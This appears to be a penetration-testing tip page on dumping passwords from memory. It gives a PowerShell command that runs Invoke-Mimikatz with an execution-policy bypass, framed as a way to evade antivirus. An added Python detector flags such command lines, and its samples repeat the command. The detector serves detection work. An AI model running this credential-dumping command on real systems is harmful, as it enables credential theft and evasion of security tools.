Penetration Testing, Post-Exploitation

Grabbing Passwords from Memory

* Using PowerShell, we can bypass AVs more easily than with mimikatz.exe, which AVs normally block.

* Upload Invoke-Mimikatz.ps1 (part of the Nishang Framework) to your target.

* Execute remotely:

powershell.exe -ExecutionPolicy Bypass -NonInteractive -Command "Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz"
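
From the defender's side, the command above leaves recognizable traces in process-creation logs. The following added example (not part of the original page) scores command lines for the switches and script name used here. The function names, severity labels and sample lines are constructed for illustration, and it assumes process command-line logging is enabled.

```python
import re

# Switch names from the command on this page. powershell.exe accepts shortened
# parameter names, so each is matched by prefix down to its minimum length.
def _is_switch(token, full, min_len, aliases=()):
    if not token.startswith(("-", "/")):
        return False
    name = token[1:].lower()
    return name in aliases or (len(name) >= min_len and full.startswith(name))

SCRIPT_NAME = re.compile(r"invoke-mimikatz", re.I)
PS1_IMPORT = re.compile(r"import-module\s+[^\s;\"']*\.ps1", re.I)

def indicators(cmdline):
    """Return the set of indicator names found in one process command line."""
    tokens = cmdline.split()
    found = set()
    for i, tok in enumerate(tokens):
        if _is_switch(tok, "executionpolicy", 2, aliases=("ep",)):
            value = tokens[i + 1].strip("\"'").lower() if i + 1 < len(tokens) else ""
            if value == "bypass":
                found.add("policy_bypass")
        elif _is_switch(tok, "noninteractive", 4):
            found.add("non_interactive")
    if PS1_IMPORT.search(cmdline):
        found.add("ps1_import")
    if SCRIPT_NAME.search(cmdline):
        found.add("mimikatz_script")
    return found

def severity(cmdline):
    """high: known script name; medium: unattended policy bypass; else None."""
    hits = indicators(cmdline)
    if "mimikatz_script" in hits:
        return "high"
    if {"policy_bypass", "non_interactive"} <= hits:
        return "medium"
    return None

# Constructed sample command lines (not real log data).
SAMPLES = [
    r'powershell.exe -ExecutionPolicy Bypass -NonInteractive -Command "Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz"',
    r'POWERSHELL.EXE -exec bypass -noni -c "import-module .\invoke-mimikatz.ps1; invoke-mimikatz"',
    r'powershell.exe -ep Bypass -NonI -File C:\Scripts\backup.ps1',
    r'powershell.exe -Command "Get-Service"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(severity(line), sorted(indicators(line)), line, sep=" | ")
```

Name matching is brittle on its own, so treat it as one signal alongside PowerShell script block logging and monitoring of access to LSASS memory.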